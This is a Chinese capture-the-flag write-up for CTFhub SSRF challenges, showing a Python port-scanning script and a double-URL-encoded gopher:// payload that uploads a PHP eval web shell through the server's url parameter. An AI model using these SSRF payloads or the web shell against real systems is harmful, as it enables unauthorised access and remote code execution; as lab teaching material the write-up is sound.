CTFhub ssrf 端口扫描&文件上传

首先是端口扫描写个脚本或用burpsuite爆破都行,现在给大家我写的一个脚本

import requests

s=requests.Session()
url='网址/?url=127.0.0.1:'

for i in range(8000,9001):
	url2=url+str(i)
	a=s.get(url2,timeout=1).text
	if "{" in a:
		print("端口:%s FLAG:%s"%(i,a))
	else:
		print("no:"+str(i))

现在是文件上传,这个稍微麻烦一点

因为一开始也是一片空白,按照习惯先看看flag.php

?url=file:///var/www/html/flag.php
先看看

 CTFhub ssrf 端口扫描&文件上传_第1张图片

是这样的,看样子真是上传一个文件

 但是发现没有提交的按钮,这个简单,因为html是前端语言,是可以自己修改的,找到这里

CTFhub ssrf 端口扫描&文件上传_第2张图片

添加一个提交的按钮就行了

 

 CTFhub ssrf 端口扫描&文件上传_第3张图片

这样就行了

发现用文件上传不了,看看源代码,猜测和POST请求一样要用gopher协议

随便上传一个文件用burpsuite拦截

把数据包url加密一下,把%0A换成%0D%0A

POST%20/flag.php%20HTTP/1.1%0D%0AHost%3A%20challenge-e93372a458f050d8.sandbox.ctfhub.com%3A10800%0D%0AUser-Agent%3A%20Mozilla/5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%3B%20rv%3A104.0%29%20Gecko/20100101%20Firefox/104.0%0D%0AAccept%3A%20text/html%2Capplication/xhtml%2Bxml%2Capplication/xml%3Bq%3D0.9%2Cimage/avif%2Cimage/webp%2C%2A/%2A%3Bq%3D0.8%0D%0AAccept-Language%3A%20zh-CN%2Czh%3Bq%3D0.8%2Czh-TW%3Bq%3D0.7%2Czh-HK%3Bq%3D0.5%2Cen-US%3Bq%3D0.3%2Cen%3Bq%3D0.2%0D%0AAccept-Encoding%3A%20gzip%2C%20deflate%0D%0AContent-Type%3A%20multipart/form-data%3B%20boundary%3D---------------------------104726037936527385742619552207%0D%0AContent-Length%3A%20263%0D%0AOrigin%3A%20http%3A//challenge-e93372a458f050d8.sandbox.ctfhub.com%3A10800%0D%0ADNT%3A%201%0D%0AConnection%3A%20close%0D%0AReferer%3A%20http%3A//challenge-e93372a458f050d8.sandbox.ctfhub.com%3A10800/%3Furl%3Dfile%3A///var/www/html/flag.php%0D%0AUpgrade-Insecure-Requests%3A%201%0D%0AX-Forwarded-For%3A%20127.0.0.1%0D%0APragma%3A%20no-cache%0D%0ACache-Control%3A%20no-cache%0D%0A%0D%0A-----------------------------104726037936527385742619552207%0D%0AContent-Disposition%3A%20form-data%3B%20name%3D%22file%22%3B%20filename%3D%22mu.php%22%0D%0AContent-Type%3A%20application/octet-stream%0D%0A%0D%0A%3C%3Fphp%20%40eval%28%24_POST%5B%22cmd%22%5D%29%3B%3F%3E%0D%0A%0D%0A-----------------------------104726037936527385742619552207--

 在加密一次

POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520challenge-e93372a458f050d8.sandbox.ctfhub.com%253A10800%250D%250AUser-Agent%253A%2520Mozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%253B%2520rv%253A104.0%2529%2520Gecko/20100101%2520Firefox/104.0%250D%250AAccept%253A%2520text/html%252Capplication/xhtml%252Bxml%252Capplication/xml%253Bq%253D0.9%252Cimage/avif%252Cimage/webp%252C%252A/%252A%253Bq%253D0.8%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.8%252Czh-TW%253Bq%253D0.7%252Czh-HK%253Bq%253D0.5%252Cen-US%253Bq%253D0.3%252Cen%253Bq%253D0.2%250D%250AAccept-Encoding%253A%2520gzip%252C%2520deflate%250D%250AContent-Type%253A%2520multipart/form-data%253B%2520boundary%253D---------------------------104726037936527385742619552207%250D%250AContent-Length%253A%2520263%250D%250AOrigin%253A%2520http%253A//challenge-e93372a458f050d8.sandbox.ctfhub.com%253A10800%250D%250ADNT%253A%25201%250D%250AConnection%253A%2520close%250D%250AReferer%253A%2520http%253A//challenge-e93372a458f050d8.sandbox.ctfhub.com%253A10800/%253Furl%253Dfile%253A///var/www/html/flag.php%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250AX-Forwarded-For%253A%2520127.0.0.1%250D%250APragma%253A%2520no-cache%250D%250ACache-Control%253A%2520no-cache%250D%250A%250D%250A-----------------------------104726037936527385742619552207%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522file%2522%253B%2520filename%253D%2522mu.php%2522%250D%250AContent-Type%253A%2520application/octet-stream%250D%250A%250D%250A%253C%253Fphp%2520%2540eval%2528%2524_POST%255B%2522cmd%2522%255D%2529%253B%253F%253E%250D%250A%250D%250A-----------------------------104726037936527385742619552207--

用gopher://提交

所以最终为

playloed:?url=gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520challenge-e93372a458f050d8.sandbox.ctfhub.com%253A10800%250D%250AUser-Agent%253A%2520Mozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%253B%2520rv%253A104.0%2529%2520Gecko/20100101%2520Firefox/104.0%250D%250AAccept%253A%2520text/html%252Capplication/xhtml%252Bxml%252Capplication/xml%253Bq%253D0.9%252Cimage/avif%252Cimage/webp%252C%252A/%252A%253Bq%253D0.8%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.8%252Czh-TW%253Bq%253D0.7%252Czh-HK%253Bq%253D0.5%252Cen-US%253Bq%253D0.3%252Cen%253Bq%253D0.2%250D%250AAccept-Encoding%253A%2520gzip%252C%2520deflate%250D%250AContent-Type%253A%2520multipart/form-data%253B%2520boundary%253D---------------------------104726037936527385742619552207%250D%250AContent-Length%253A%2520263%250D%250AOrigin%253A%2520http%253A//challenge-e93372a458f050d8.sandbox.ctfhub.com%253A10800%250D%250ADNT%253A%25201%250D%250AConnection%253A%2520close%250D%250AReferer%253A%2520http%253A//challenge-e93372a458f050d8.sandbox.ctfhub.com%253A10800/%253Furl%253Dfile%253A///var/www/html/flag.php%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250AX-Forwarded-For%253A%2520127.0.0.1%250D%250APragma%253A%2520no-cache%250D%250ACache-Control%253A%2520no-cache%250D%250A%250D%250A-----------------------------104726037936527385742619552207%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522file%2522%253B%2520filename%253D%2522mu.php%2522%250D%250AContent-Type%253A%2520application/octet-stream%250D%250A%250D%250A%253C%253Fphp%2520%2540eval%2528%2524_POST%255B%2522cmd%2522%255D%2529%253B%253F%253E%250D%250A%250D%250A-----------------------------104726037936527385742619552207--

你可能感兴趣的:(CTF,php,开发语言)